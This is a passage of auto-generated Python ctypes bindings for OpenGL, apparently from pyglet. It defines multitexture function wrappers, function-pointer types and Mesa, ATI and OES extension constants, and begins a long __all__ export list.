glMultiTexCoord4dARB = _link_function('glMultiTexCoord4dARB', None, [GLenum, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:2028
glMultiTexCoord4dvARB = _link_function('glMultiTexCoord4dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2029
glMultiTexCoord4fARB = _link_function('glMultiTexCoord4fARB', None, [GLenum, GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:2030
glMultiTexCoord4fvARB = _link_function('glMultiTexCoord4fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2031
glMultiTexCoord4iARB = _link_function('glMultiTexCoord4iARB', None, [GLenum, GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:2032
glMultiTexCoord4ivARB = _link_function('glMultiTexCoord4ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2033
glMultiTexCoord4sARB = _link_function('glMultiTexCoord4sARB', None, [GLenum, GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:2034
glMultiTexCoord4svARB = _link_function('glMultiTexCoord4svARB', None, [GLenum, POINTER(GLshort)], None)
PFNGLACTIVETEXTUREARBPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:2036
PFNGLCLIENTACTIVETEXTUREARBPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:2037
PFNGLMULTITEXCOORD1DARBPROC = CFUNCTYPE(None, GLenum, GLdouble) # /usr/include/GL/gl.h:2038
PFNGLMULTITEXCOORD1DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2039
PFNGLMULTITEXCOORD1FARBPROC = CFUNCTYPE(None, GLenum, GLfloat) # /usr/include/GL/gl.h:2040
PFNGLMULTITEXCOORD1FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2041
PFNGLMULTITEXCOORD1IARBPROC = CFUNCTYPE(None, GLenum, GLint) # /usr/include/GL/gl.h:2042
PFNGLMULTITEXCOORD1IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2043
PFNGLMULTITEXCOORD1SARBPROC = CFUNCTYPE(None, GLenum, GLshort) # /usr/include/GL/gl.h:2044
PFNGLMULTITEXCOORD1SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2045
PFNGLMULTITEXCOORD2DARBPROC = CFUNCTYPE(None, GLenum, GLdouble, GLdouble) # /usr/include/GL/gl.h:2046
PFNGLMULTITEXCOORD2DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2047
PFNGLMULTITEXCOORD2FARBPROC = CFUNCTYPE(None, GLenum, GLfloat, GLfloat) # /usr/include/GL/gl.h:2048
PFNGLMULTITEXCOORD2FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2049
PFNGLMULTITEXCOORD2IARBPROC = CFUNCTYPE(None, GLenum, GLint, GLint) # /usr/include/GL/gl.h:2050
PFNGLMULTITEXCOORD2IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2051
PFNGLMULTITEXCOORD2SARBPROC = CFUNCTYPE(None, GLenum, GLshort, GLshort) # /usr/include/GL/gl.h:2052
PFNGLMULTITEXCOORD2SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2053
PFNGLMULTITEXCOORD3DARBPROC = CFUNCTYPE(None, GLenum, GLdouble, GLdouble, GLdouble) # /usr/include/GL/gl.h:2054
PFNGLMULTITEXCOORD3DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2055
PFNGLMULTITEXCOORD3FARBPROC = CFUNCTYPE(None, GLenum, GLfloat, GLfloat, GLfloat) # /usr/include/GL/gl.h:2056
PFNGLMULTITEXCOORD3FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2057
PFNGLMULTITEXCOORD3IARBPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint) # /usr/include/GL/gl.h:2058
PFNGLMULTITEXCOORD3IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2059
PFNGLMULTITEXCOORD3SARBPROC = CFUNCTYPE(None, GLenum, GLshort, GLshort, GLshort) # /usr/include/GL/gl.h:2060
PFNGLMULTITEXCOORD3SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2061
PFNGLMULTITEXCOORD4DARBPROC = CFUNCTYPE(None, GLenum, GLdouble, GLdouble, GLdouble, GLdouble) # /usr/include/GL/gl.h:2062
PFNGLMULTITEXCOORD4DVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLdouble)) # /usr/include/GL/gl.h:2063
PFNGLMULTITEXCOORD4FARBPROC = CFUNCTYPE(None, GLenum, GLfloat, GLfloat, GLfloat, GLfloat) # /usr/include/GL/gl.h:2064
PFNGLMULTITEXCOORD4FVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLfloat)) # /usr/include/GL/gl.h:2065
PFNGLMULTITEXCOORD4IARBPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint) # /usr/include/GL/gl.h:2066
PFNGLMULTITEXCOORD4IVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLint)) # /usr/include/GL/gl.h:2067
PFNGLMULTITEXCOORD4SARBPROC = CFUNCTYPE(None, GLenum, GLshort, GLshort, GLshort, GLshort) # /usr/include/GL/gl.h:2068
PFNGLMULTITEXCOORD4SVARBPROC = CFUNCTYPE(None, GLenum, POINTER(GLshort)) # /usr/include/GL/gl.h:2069
GL_MESA_shader_debug = 1 # /usr/include/GL/gl.h:2094
GL_DEBUG_OBJECT_MESA = 34649 # /usr/include/GL/gl.h:2096
GL_DEBUG_PRINT_MESA = 34650 # /usr/include/GL/gl.h:2097
GL_DEBUG_ASSERT_MESA = 34651 # /usr/include/GL/gl.h:2098
GLhandleARB = c_uint # /usr/include/GL/glext.h:5340
# /usr/include/GL/gl.h:2100
glCreateDebugObjectMESA = _link_function('glCreateDebugObjectMESA', GLhandleARB, [], None)
# /usr/include/GL/gl.h:2101
glClearDebugLogMESA = _link_function('glClearDebugLogMESA', None, [GLhandleARB, GLenum, GLenum], None)
GLcharARB = c_char # /usr/include/GL/glext.h:5339
# /usr/include/GL/gl.h:2102
glGetDebugLogMESA = _link_function('glGetDebugLogMESA', None, [GLhandleARB, GLenum, GLenum, GLsizei, POINTER(GLsizei), POINTER(GLcharARB)], None)
# /usr/include/GL/gl.h:2104
glGetDebugLogLengthMESA = _link_function('glGetDebugLogLengthMESA', GLsizei, [GLhandleARB, GLenum, GLenum], None)
GL_MESA_packed_depth_stencil = 1 # /usr/include/GL/gl.h:2116
GL_DEPTH_STENCIL_MESA = 34640 # /usr/include/GL/gl.h:2118
GL_UNSIGNED_INT_24_8_MESA = 34641 # /usr/include/GL/gl.h:2119
GL_UNSIGNED_INT_8_24_REV_MESA = 34642 # /usr/include/GL/gl.h:2120
GL_UNSIGNED_SHORT_15_1_MESA = 34643 # /usr/include/GL/gl.h:2121
GL_UNSIGNED_SHORT_1_15_REV_MESA = 34644 # /usr/include/GL/gl.h:2122
GL_MESA_program_debug = 1 # /usr/include/GL/gl.h:2128
GL_FRAGMENT_PROGRAM_POSITION_MESA = 35760 # /usr/include/GL/gl.h:2130
GL_FRAGMENT_PROGRAM_CALLBACK_MESA = 35761 # /usr/include/GL/gl.h:2131
GL_FRAGMENT_PROGRAM_CALLBACK_FUNC_MESA = 35762 # /usr/include/GL/gl.h:2132
GL_FRAGMENT_PROGRAM_CALLBACK_DATA_MESA = 35763 # /usr/include/GL/gl.h:2133
GL_VERTEX_PROGRAM_POSITION_MESA = 35764 # /usr/include/GL/gl.h:2134
GL_VERTEX_PROGRAM_CALLBACK_MESA = 35765 # /usr/include/GL/gl.h:2135
GL_VERTEX_PROGRAM_CALLBACK_FUNC_MESA = 35766 # /usr/include/GL/gl.h:2136
GL_VERTEX_PROGRAM_CALLBACK_DATA_MESA = 35767 # /usr/include/GL/gl.h:2137
GLprogramcallbackMESA = CFUNCTYPE(None, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:2139
# /usr/include/GL/gl.h:2141
glProgramCallbackMESA = _link_function('glProgramCallbackMESA', None, [GLenum, GLprogramcallbackMESA, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:2143
glGetProgramRegisterfvMESA = _link_function('glGetProgramRegisterfvMESA', None, [GLenum, GLsizei, POINTER(GLubyte), POINTER(GLfloat)], None)
GL_MESA_texture_array = 1 # /usr/include/GL/gl.h:2149
GL_ATI_blend_equation_separate = 1 # /usr/include/GL/gl.h:2182
GL_ALPHA_BLEND_EQUATION_ATI = 34877 # /usr/include/GL/gl.h:2184
# /usr/include/GL/gl.h:2186
glBlendEquationSeparateATI = _link_function('glBlendEquationSeparateATI', None, [GLenum, GLenum], None)
PFNGLBLENDEQUATIONSEPARATEATIPROC = CFUNCTYPE(None, GLenum, GLenum) # /usr/include/GL/gl.h:2187
GLeglImageOES = POINTER(None) # /usr/include/GL/gl.h:2194
GL_OES_EGL_image = 1 # /usr/include/GL/gl.h:2198
PFNGLEGLIMAGETARGETTEXTURE2DOESPROC = CFUNCTYPE(None, GLenum, GLeglImageOES) # /usr/include/GL/gl.h:2203
PFNGLEGLIMAGETARGETRENDERBUFFERSTORAGEOESPROC = CFUNCTYPE(None, GLenum, GLeglImageOES) # /usr/include/GL/gl.h:2204
__all__ = ['GL_VERSION_1_1', 'GL_VERSION_1_2', 'GL_VERSION_1_3',
'GL_ARB_imaging', 'GLenum', 'GLboolean', 'GLbitfield', 'GLvoid', 'GLbyte',
'GLshort', 'GLint', 'GLubyte', 'GLushort', 'GLuint', 'GLsizei', 'GLfloat',
'GLclampf', 'GLdouble', 'GLclampd', 'GL_FALSE', 'GL_TRUE', 'GL_BYTE',
'GL_UNSIGNED_BYTE', 'GL_SHORT', 'GL_UNSIGNED_SHORT', 'GL_INT',
'GL_UNSIGNED_INT', 'GL_FLOAT', 'GL_2_BYTES', 'GL_3_BYTES', 'GL_4_BYTES',
'GL_DOUBLE', 'GL_POINTS', 'GL_LINES', 'GL_LINE_LOOP', 'GL_LINE_STRIP',
'GL_TRIANGLES', 'GL_TRIANGLE_STRIP', 'GL_TRIANGLE_FAN', 'GL_QUADS',
'GL_QUAD_STRIP', 'GL_POLYGON', 'GL_VERTEX_ARRAY', 'GL_NORMAL_ARRAY',
'GL_COLOR_ARRAY', 'GL_INDEX_ARRAY', 'GL_TEXTURE_COORD_ARRAY',
'GL_EDGE_FLAG_ARRAY', 'GL_VERTEX_ARRAY_SIZE', 'GL_VERTEX_ARRAY_TYPE',
'GL_VERTEX_ARRAY_STRIDE', 'GL_NORMAL_ARRAY_TYPE', 'GL_NORMAL_ARRAY_STRIDE',
'GL_COLOR_ARRAY_SIZE', 'GL_COLOR_ARRAY_TYPE', 'GL_COLOR_ARRAY_STRIDE',
'GL_INDEX_ARRAY_TYPE', 'GL_INDEX_ARRAY_STRIDE', 'GL_TEXTURE_COORD_ARRAY_SIZE',
'GL_TEXTURE_COORD_ARRAY_TYPE', 'GL_TEXTURE_COORD_ARRAY_STRIDE',
'GL_EDGE_FLAG_ARRAY_STRIDE', 'GL_VERTEX_ARRAY_POINTER',
'GL_NORMAL_ARRAY_POINTER', 'GL_COLOR_ARRAY_POINTER', 'GL_INDEX_ARRAY_POINTER',
'GL_TEXTURE_COORD_ARRAY_POINTER', 'GL_EDGE_FLAG_ARRAY_POINTER', 'GL_V2F',
'GL_V3F', 'GL_C4UB_V2F', 'GL_C4UB_V3F', 'GL_C3F_V3F', 'GL_N3F_V3F',
'GL_C4F_N3F_V3F', 'GL_T2F_V3F', 'GL_T4F_V4F', 'GL_T2F_C4UB_V3F',
'GL_T2F_C3F_V3F', 'GL_T2F_N3F_V3F', 'GL_T2F_C4F_N3F_V3F',
'GL_T4F_C4F_N3F_V4F', 'GL_MATRIX_MODE', 'GL_MODELVIEW', 'GL_PROJECTION',
'GL_TEXTURE', 'GL_POINT_SMOOTH', 'GL_POINT_SIZE', 'GL_POINT_SIZE_GRANULARITY',
'GL_POINT_SIZE_RANGE', 'GL_LINE_SMOOTH', 'GL_LINE_STIPPLE',
'GL_LINE_STIPPLE_PATTERN', 'GL_LINE_STIPPLE_REPEAT', 'GL_LINE_WIDTH',
'GL_LINE_WIDTH_GRANULARITY', 'GL_LINE_WIDTH_RANGE', 'GL_POINT', 'GL_LINE',
'GL_FILL', 'GL_CW', 'GL_CCW', 'GL_FRONT', 'GL_BACK', 'GL_POLYGON_MODE',
'GL_POLYGON_SMOOTH', 'GL_POLYGON_STIPPLE', 'GL_EDGE_FLAG', 'GL_CULL_FACE',
'GL_CULL_FACE_MODE', 'GL_FRONT_FACE', 'GL_POLYGON_OFFSET_FACTOR',
'GL_POLYGON_OFFSET_UNITS', 'GL_POLYGON_OFFSET_POINT',
'GL_POLYGON_OFFSET_LINE', 'GL_POLYGON_OFFSET_FILL', 'GL_COMPILE',
'GL_COMPILE_AND_EXECUTE', 'GL_LIST_BASE', 'GL_LIST_INDEX', 'GL_LIST_MODE',
'GL_NEVER', 'GL_LESS', 'GL_EQUAL', 'GL_LEQUAL', 'GL_GREATER', 'GL_NOTEQUAL',
'GL_GEQUAL', 'GL_ALWAYS', 'GL_DEPTH_TEST', 'GL_DEPTH_BITS',
'GL_DEPTH_CLEAR_VALUE', 'GL_DEPTH_FUNC', 'GL_DEPTH_RANGE',
'GL_DEPTH_WRITEMASK', 'GL_DEPTH_COMPONENT', 'GL_LIGHTING', 'GL_LIGHT0',
'GL_LIGHT1', 'GL_LIGHT2', 'GL_LIGHT3', 'GL_LIGHT4', 'GL_LIGHT5', 'GL_LIGHT6',
'GL_LIGHT7', 'GL_SPOT_EXPONENT', 'GL_SPOT_CUTOFF', 'GL_CONSTANT_ATTENUATION',
'GL_LINEAR_ATTENUATION', 'GL_QUADRATIC_ATTENUATION', 'GL_AMBIENT',
'GL_DIFFUSE', 'GL_SPECULAR', 'GL_SHININESS', 'GL_EMISSION', 'GL_POSITION',
'GL_SPOT_DIRECTION', 'GL_AMBIENT_AND_DIFFUSE', 'GL_COLOR_INDEXES',
'GL_LIGHT_MODEL_TWO_SIDE', 'GL_LIGHT_MODEL_LOCAL_VIEWER',
'GL_LIGHT_MODEL_AMBIENT', 'GL_FRONT_AND_BACK', 'GL_SHADE_MODEL', 'GL_FLAT',
'GL_SMOOTH', 'GL_COLOR_MATERIAL', 'GL_COLOR_MATERIAL_FACE',
'GL_COLOR_MATERIAL_PARAMETER', 'GL_NORMALIZE', 'GL_CLIP_PLANE0',
'GL_CLIP_PLANE1', 'GL_CLIP_PLANE2', 'GL_CLIP_PLANE3', 'GL_CLIP_PLANE4',
'GL_CLIP_PLANE5', 'GL_ACCUM_RED_BITS', 'GL_ACCUM_GREEN_BITS',
'GL_ACCUM_BLUE_BITS', 'GL_ACCUM_ALPHA_BITS', 'GL_ACCUM_CLEAR_VALUE',
'GL_ACCUM', 'GL_ADD', 'GL_LOAD', 'GL_MULT', 'GL_RETURN', 'GL_ALPHA_TEST',
'GL_ALPHA_TEST_REF', 'GL_ALPHA_TEST_FUNC', 'GL_BLEND', 'GL_BLEND_SRC',
'GL_BLEND_DST', 'GL_ZERO', 'GL_ONE', 'GL_SRC_COLOR', 'GL_ONE_MINUS_SRC_COLOR',
'GL_SRC_ALPHA', 'GL_ONE_MINUS_SRC_ALPHA', 'GL_DST_ALPHA',
'GL_ONE_MINUS_DST_ALPHA', 'GL_DST_COLOR', 'GL_ONE_MINUS_DST_COLOR',
'GL_SRC_ALPHA_SATURATE', 'GL_FEEDBACK', 'GL_RENDER', 'GL_SELECT', 'GL_2D',
'GL_3D', 'GL_3D_COLOR', 'GL_3D_COLOR_TEXTURE', 'GL_4D_COLOR_TEXTURE',
'GL_POINT_TOKEN', 'GL_LINE_TOKEN', 'GL_LINE_RESET_TOKEN', 'GL_POLYGON_TOKEN',
'GL_BITMAP_TOKEN', 'GL_DRAW_PIXEL_TOKEN', 'GL_COPY_PIXEL_TOKEN',
'GL_PASS_THROUGH_TOKEN', 'GL_FEEDBACK_BUFFER_POINTER',
'GL_FEEDBACK_BUFFER_SIZE', 'GL_FEEDBACK_BUFFER_TYPE',
'GL_SELECTION_BUFFER_POINTER', 'GL_SELECTION_BUFFER_SIZE', 'GL_FOG',
'GL_FOG_MODE', 'GL_FOG_DENSITY', 'GL_FOG_COLOR', 'GL_FOG_INDEX',
'GL_FOG_START', 'GL_FOG_END', 'GL_LINEAR', 'GL_EXP', 'GL_EXP2', 'GL_LOGIC_OP',
'GL_INDEX_LOGIC_OP', 'GL_COLOR_LOGIC_OP', 'GL_LOGIC_OP_MODE', 'GL_CLEAR',
'GL_SET', 'GL_COPY', 'GL_COPY_INVERTED', 'GL_NOOP', 'GL_INVERT', 'GL_AND',
'GL_NAND', 'GL_OR', 'GL_NOR', 'GL_XOR', 'GL_EQUIV', 'GL_AND_REVERSE',
'GL_AND_INVERTED', 'GL_OR_REVERSE', 'GL_OR_INVERTED', 'GL_STENCIL_BITS',
'GL_STENCIL_TEST', 'GL_STENCIL_CLEAR_VALUE', 'GL_STENCIL_FUNC',
'GL_STENCIL_VALUE_MASK', 'GL_STENCIL_FAIL', 'GL_STENCIL_PASS_DEPTH_FAIL',
'GL_STENCIL_PASS_DEPTH_PASS', 'GL_STENCIL_REF', 'GL_STENCIL_WRITEMASK',
'GL_STENCIL_INDEX', 'GL_KEEP', 'GL_REPLACE', 'GL_INCR', 'GL_DECR', 'GL_NONE',
'GL_LEFT', 'GL_RIGHT', 'GL_FRONT_LEFT', 'GL_FRONT_RIGHT', 'GL_BACK_LEFT',
'GL_BACK_RIGHT', 'GL_AUX0', 'GL_AUX1', 'GL_AUX2', 'GL_AUX3', 'GL_COLOR_INDEX',
'GL_RED', 'GL_GREEN', 'GL_BLUE', 'GL_ALPHA', 'GL_LUMINANCE',
'GL_LUMINANCE_ALPHA', 'GL_ALPHA_BITS', 'GL_RED_BITS', 'GL_GREEN_BITS',
'GL_BLUE_BITS', 'GL_INDEX_BITS', 'GL_SUBPIXEL_BITS', 'GL_AUX_BUFFERS',
'GL_READ_BUFFER', 'GL_DRAW_BUFFER', 'GL_DOUBLEBUFFER', 'GL_STEREO',
'GL_BITMAP', 'GL_COLOR', 'GL_DEPTH', 'GL_STENCIL', 'GL_DITHER', 'GL_RGB',
'GL_RGBA', 'GL_MAX_LIST_NESTING', 'GL_MAX_EVAL_ORDER', 'GL_MAX_LIGHTS',
'GL_MAX_CLIP_PLANES', 'GL_MAX_TEXTURE_SIZE', 'GL_MAX_PIXEL_MAP_TABLE',
'GL_MAX_ATTRIB_STACK_DEPTH', 'GL_MAX_MODELVIEW_STACK_DEPTH',
'GL_MAX_NAME_STACK_DEPTH', 'GL_MAX_PROJECTION_STACK_DEPTH',
'GL_MAX_TEXTURE_STACK_DEPTH', 'GL_MAX_VIEWPORT_DIMS',
'GL_MAX_CLIENT_ATTRIB_STACK_DEPTH', 'GL_ATTRIB_STACK_DEPTH',
'GL_CLIENT_ATTRIB_STACK_DEPTH', 'GL_COLOR_CLEAR_VALUE', 'GL_COLOR_WRITEMASK',
'GL_CURRENT_INDEX', 'GL_CURRENT_COLOR', 'GL_CURRENT_NORMAL',
'GL_CURRENT_RASTER_COLOR', 'GL_CURRENT_RASTER_DISTANCE',
'GL_CURRENT_RASTER_INDEX', 'GL_CURRENT_RASTER_POSITION',
'GL_CURRENT_RASTER_TEXTURE_COORDS', 'GL_CURRENT_RASTER_POSITION_VALID',
'GL_CURRENT_TEXTURE_COORDS', 'GL_INDEX_CLEAR_VALUE', 'GL_INDEX_MODE',
'GL_INDEX_WRITEMASK', 'GL_MODELVIEW_MATRIX', 'GL_MODELVIEW_STACK_DEPTH',
'GL_NAME_STACK_DEPTH', 'GL_PROJECTION_MATRIX', 'GL_PROJECTION_STACK_DEPTH',
'GL_RENDER_MODE', 'GL_RGBA_MODE', 'GL_TEXTURE_MATRIX',
'GL_TEXTURE_STACK_DEPTH', 'GL_VIEWPORT', 'GL_AUTO_NORMAL', 'GL_MAP1_COLOR_4',
'GL_MAP1_INDEX', 'GL_MAP1_NORMAL', 'GL_MAP1_TEXTURE_COORD_1',
'GL_MAP1_TEXTURE_COORD_2', 'GL_MAP1_TEXTURE_COORD_3',
'GL_MAP1_TEXTURE_COORD_4', 'GL_MAP1_VERTEX_3', 'GL_MAP1_VERTEX_4',
'GL_MAP2_COLOR_4', 'GL_MAP2_INDEX', 'GL_MAP2_NORMAL',
'GL_MAP2_TEXTURE_COORD_1', 'GL_MAP2_TEXTURE_COORD_2',
'GL_MAP2_TEXTURE_COORD_3', 'GL_MAP2_TEXTURE_COORD_4', 'GL_MAP2_VERTEX_3',
'GL_MAP2_VERTEX_4', 'GL_MAP1_GRID_DOMAIN', 'GL_MAP1_GRID_SEGMENTS',
'GL_MAP2_GRID_DOMAIN', 'GL_MAP2_GRID_SEGMENTS', 'GL_COEFF', 'GL_ORDER',
'GL_DOMAIN', 'GL_PERSPECTIVE_CORRECTION_HINT', 'GL_POINT_SMOOTH_HINT',
'GL_LINE_SMOOTH_HINT', 'GL_POLYGON_SMOOTH_HINT', 'GL_FOG_HINT',
'GL_DONT_CARE', 'GL_FASTEST', 'GL_NICEST', 'GL_SCISSOR_BOX',
'GL_SCISSOR_TEST', 'GL_MAP_COLOR', 'GL_MAP_STENCIL', 'GL_INDEX_SHIFT',
'GL_INDEX_OFFSET', 'GL_RED_SCALE', 'GL_RED_BIAS', 'GL_GREEN_SCALE',
'GL_GREEN_BIAS', 'GL_BLUE_SCALE', 'GL_BLUE_BIAS', 'GL_ALPHA_SCALE',
'GL_ALPHA_BIAS', 'GL_DEPTH_SCALE', 'GL_DEPTH_BIAS',
'GL_PIXEL_MAP_S_TO_S_SIZE', 'GL_PIXEL_MAP_I_TO_I_SIZE',
'GL_PIXEL_MAP_I_TO_R_SIZE', 'GL_PIXEL_MAP_I_TO_G_SIZE',
'GL_PIXEL_MAP_I_TO_B_SIZE', 'GL_PIXEL_MAP_I_TO_A_SIZE',
'GL_PIXEL_MAP_R_TO_R_SIZE', 'GL_PIXEL_MAP_G_TO_G_SIZE',
'GL_PIXEL_MAP_B_TO_B_SIZE', 'GL_PIXEL_MAP_A_TO_A_SIZE', 'GL_PIXEL_MAP_S_TO_S',
'GL_PIXEL_MAP_I_TO_I', 'GL_PIXEL_MAP_I_TO_R', 'GL_PIXEL_MAP_I_TO_G',
'GL_PIXEL_MAP_I_TO_B', 'GL_PIXEL_MAP_I_TO_A', 'GL_PIXEL_MAP_R_TO_R',
'GL_PIXEL_MAP_G_TO_G', 'GL_PIXEL_MAP_B_TO_B', 'GL_PIXEL_MAP_A_TO_A',
'GL_PACK_ALIGNMENT', 'GL_PACK_LSB_FIRST', 'GL_PACK_ROW_LENGTH',
'GL_PACK_SKIP_PIXELS', 'GL_PACK_SKIP_ROWS', 'GL_PACK_SWAP_BYTES',
'GL_UNPACK_ALIGNMENT', 'GL_UNPACK_LSB_FIRST', 'GL_UNPACK_ROW_LENGTH',
'GL_UNPACK_SKIP_PIXELS', 'GL_UNPACK_SKIP_ROWS', 'GL_UNPACK_SWAP_BYTES',
'GL_ZOOM_X', 'GL_ZOOM_Y', 'GL_TEXTURE_ENV', 'GL_TEXTURE_ENV_MODE',
'GL_TEXTURE_1D', 'GL_TEXTURE_2D', 'GL_TEXTURE_WRAP_S', 'GL_TEXTURE_WRAP_T',
'GL_TEXTURE_MAG_FILTER', 'GL_TEXTURE_MIN_FILTER', 'GL_TEXTURE_ENV_COLOR',
'GL_TEXTURE_GEN_S', 'GL_TEXTURE_GEN_T', 'GL_TEXTURE_GEN_R',
'GL_TEXTURE_GEN_Q', 'GL_TEXTURE_GEN_MODE', 'GL_TEXTURE_BORDER_COLOR',
'GL_TEXTURE_WIDTH', 'GL_TEXTURE_HEIGHT', 'GL_TEXTURE_BORDER',
'GL_TEXTURE_COMPONENTS', 'GL_TEXTURE_RED_SIZE', 'GL_TEXTURE_GREEN_SIZE',
'GL_TEXTURE_BLUE_SIZE', 'GL_TEXTURE_ALPHA_SIZE', 'GL_TEXTURE_LUMINANCE_SIZE',
'GL_TEXTURE_INTENSITY_SIZE', 'GL_NEAREST_MIPMAP_NEAREST',
'GL_NEAREST_MIPMAP_LINEAR', 'GL_LINEAR_MIPMAP_NEAREST',
'GL_LINEAR_MIPMAP_LINEAR', 'GL_OBJECT_LINEAR', 'GL_OBJECT_PLANE',
'GL_EYE_LINEAR', 'GL_EYE_PLANE', 'GL_SPHERE_MAP', 'GL_DECAL', 'GL_MODULATE',
'GL_NEAREST', 'GL_REPEAT', 'GL_CLAMP', 'GL_S', 'GL_T', 'GL_R', 'GL_Q',
'GL_VENDOR', 'GL_RENDERER', 'GL_VERSION', 'GL_EXTENSIONS', 'GL_NO_ERROR',
'GL_INVALID_ENUM', 'GL_INVALID_VALUE', 'GL_INVALID_OPERATION',
'GL_STACK_OVERFLOW', 'GL_STACK_UNDERFLOW', 'GL_OUT_OF_MEMORY',
'GL_CURRENT_BIT', 'GL_POINT_BIT', 'GL_LINE_BIT', 'GL_POLYGON_BIT',
'GL_POLYGON_STIPPLE_BIT', 'GL_PIXEL_MODE_BIT', 'GL_LIGHTING_BIT',
'GL_FOG_BIT', 'GL_DEPTH_BUFFER_BIT', 'GL_ACCUM_BUFFER_BIT',
'GL_STENCIL_BUFFER_BIT', 'GL_VIEWPORT_BIT', 'GL_TRANSFORM_BIT',
'GL_ENABLE_BIT', 'GL_COLOR_BUFFER_BIT', 'GL_HINT_BIT', 'GL_EVAL_BIT',
'GL_LIST_BIT', 'GL_TEXTURE_BIT', 'GL_SCISSOR_BIT', 'GL_ALL_ATTRIB_BITS',
'GL_PROXY_TEXTURE_1D', 'GL_PROXY_TEXTURE_2D', 'GL_TEXTURE_PRIORITY',
'GL_TEXTURE_RESIDENT', 'GL_TEXTURE_BINDING_1D', 'GL_TEXTURE_BINDING_2D',
'GL_TEXTURE_INTERNAL_FORMAT', 'GL_ALPHA4', 'GL_ALPHA8', 'GL_ALPHA12',
'GL_ALPHA16', 'GL_LUMINANCE4', 'GL_LUMINANCE8', 'GL_LUMINANCE12',
'GL_LUMINANCE16', 'GL_LUMINANCE4_ALPHA4', 'GL_LUMINANCE6_ALPHA2',
'GL_LUMINANCE8_ALPHA8', 'GL_LUMINANCE12_ALPHA4', 'GL_LUMINANCE12_ALPHA12',
'GL_LUMINANCE16_ALPHA16', 'GL_INTENSITY', 'GL_INTENSITY4', 'GL_INTENSITY8',
'GL_INTENSITY12', 'GL_INTENSITY16', 'GL_R3_G3_B2', 'GL_RGB4', 'GL_RGB5',
'GL_RGB8', 'GL_RGB10', 'GL_RGB12', 'GL_RGB16', 'GL_RGBA2', 'GL_RGBA4',
'GL_RGB5_A1', 'GL_RGBA8', 'GL_RGB10_A2', 'GL_RGBA12', 'GL_RGBA16',
'GL_CLIENT_PIXEL_STORE_BIT', 'GL_CLIENT_VERTEX_ARRAY_BIT',
'GL_ALL_CLIENT_ATTRIB_BITS', 'GL_CLIENT_ALL_ATTRIB_BITS', 'glClearIndex',
'glClearColor', 'glClear', 'glIndexMask', 'glColorMask', 'glAlphaFunc',
'glBlendFunc', 'glLogicOp', 'glCullFace', 'glFrontFace', 'glPointSize',
'glLineWidth', 'glLineStipple', 'glPolygonMode', 'glPolygonOffset',
'glPolygonStipple', 'glGetPolygonStipple', 'glEdgeFlag', 'glEdgeFlagv',
'glScissor', 'glClipPlane', 'glGetClipPlane', 'glDrawBuffer', 'glReadBuffer',
'glEnable', 'glDisable', 'glIsEnabled', 'glEnableClientState',
'glDisableClientState', 'glGetBooleanv', 'glGetDoublev', 'glGetFloatv',
'glGetIntegerv', 'glPushAttrib', 'glPopAttrib', 'glPushClientAttrib',
'glPopClientAttrib', 'glRenderMode', 'glGetError', 'glGetString', 'glFinish',
'glFlush', 'glHint', 'glClearDepth', 'glDepthFunc', 'glDepthMask',
'glDepthRange', 'glClearAccum', 'glAccum', 'glMatrixMode', 'glOrtho',
'glFrustum', 'glViewport', 'glPushMatrix', 'glPopMatrix', 'glLoadIdentity',
'glLoadMatrixd', 'glLoadMatrixf', 'glMultMatrixd', 'glMultMatrixf',
'glRotated', 'glRotatef', 'glScaled', 'glScalef', 'glTranslated',
'glTranslatef', 'glIsList', 'glDeleteLists', 'glGenLists', 'glNewList',
'glEndList', 'glCallList', 'glCallLists', 'glListBase', 'glBegin', 'glEnd',
'glVertex2d', 'glVertex2f', 'glVertex2i', 'glVertex2s', 'glVertex3d',
'glVertex3f', 'glVertex3i', 'glVertex3s', 'glVertex4d', 'glVertex4f',
'glVertex4i', 'glVertex4s', 'glVertex2dv', 'glVertex2fv', 'glVertex2iv',
'glVertex2sv', 'glVertex3dv', 'glVertex3fv', 'glVertex3iv', 'glVertex3sv',
'glVertex4dv', 'glVertex4fv', 'glVertex4iv', 'glVertex4sv', 'glNormal3b',
'glNormal3d', 'glNormal3f', 'glNormal3i', 'glNormal3s', 'glNormal3bv',
'glNormal3dv', 'glNormal3fv', 'glNormal3iv', 'glNormal3sv', 'glIndexd',
'glIndexf', 'glIndexi', 'glIndexs', 'glIndexub', 'glIndexdv', 'glIndexfv',
